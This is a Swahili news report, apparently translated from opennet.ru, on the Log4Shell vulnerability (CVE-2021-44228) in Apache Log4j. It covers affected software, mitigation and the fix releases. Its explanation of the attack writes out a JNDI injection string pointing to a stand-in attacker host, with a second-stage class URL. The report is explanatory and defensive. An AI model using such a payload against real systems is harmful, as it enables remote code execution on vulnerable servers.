Katika Apache Log4j, mfumo maarufu wa kupanga kumbukumbu katika programu za Java, athari kubwa imetambuliwa ambayo inaruhusu msimbo kiholela kutekelezwa wakati thamani iliyoumbizwa mahususi katika umbizo la "{jndi:URL}" inapoandikwa kwenye kumbukumbu. Shambulio hilo linaweza kufanywa kwenye programu za Java ambazo huweka maadili yaliyopokelewa kutoka kwa vyanzo vya nje, kwa mfano, wakati wa kuonyesha maadili ya shida katika ujumbe wa makosa.
Imebainika kuwa karibu miradi yote inayotumia mifumo kama vile Apache Struts, Apache Solr, Apache Druid au Apache Flink huathiriwa na shida, pamoja na Steam, Apple iCloud, wateja wa Minecraft na seva. Inatarajiwa kwamba udhaifu huo unaweza kusababisha wimbi la mashambulizi makubwa kwa maombi ya kampuni, kurudia historia ya udhaifu mkubwa katika mfumo wa Apache Struts, ambayo, kulingana na makadirio mabaya, hutumiwa katika maombi ya mtandao na 65% ya Bahati. Kampuni 100. Ikiwa ni pamoja na majaribio ya kukagua mtandao kwa mifumo iliyo hatarini.
Tatizo linazidishwa na ukweli kwamba unyonyaji wa kufanya kazi tayari umechapishwa, lakini marekebisho ya matawi thabiti bado hayajaundwa. Kitambulisho cha CVE bado hakijakabidhiwa. Marekebisho yamejumuishwa tu kwenye tawi la jaribio la log4j-2.15.0-rc1. Kama suluhisho la kuzuia uwezekano wa kuathiriwa, inashauriwa kuweka kigezo cha log4j2.formatMsgNoLookups kuwa kweli.
Tatizo lilisababishwa na ukweli kwamba log4j inasaidia usindikaji wa vinyago maalum "{}" katika pato la mistari kwenye logi, ambapo maswali ya JNDI (Java ya Kutaja na Saraka) yanaweza kutekelezwa. Shambulio hilo linatokana na kupitisha mfuatano na uingizwaji wa "${jndi:ldap://attacker.com/a}", ikishachakata ambayo log4j itatuma ombi la LDAP la njia ya darasa la Java kwa seva ya attacker.com. . Njia iliyorejeshwa na seva ya mshambulizi (kwa mfano, http://second-stage.attacker.com/Exploit.class) itapakiwa na kutekelezwa katika muktadha wa mchakato wa sasa, ambao unamruhusu mshambuliaji kutekeleza msimbo kiholela kwenye mfumo na haki za programu ya sasa.
Nyongeza ya 1: Athari ya kuathirika imepewa kitambulisho CVE-2021-44228.
Nyongeza ya 2: Njia ya kukwepa ulinzi ulioongezwa na toleo la log4j-2.15.0-rc1 imetambuliwa. Sasisho jipya, log4j-2.15.0-rc2, limependekezwa likiwa na ulinzi kamili zaidi dhidi ya athari. Nambari hii inaangazia mabadiliko yanayohusiana na kutokuwepo kwa uondoaji usio wa kawaida katika kesi ya kutumia URL ya JNDI iliyoumbizwa vibaya.
Chanzo: opennet.ru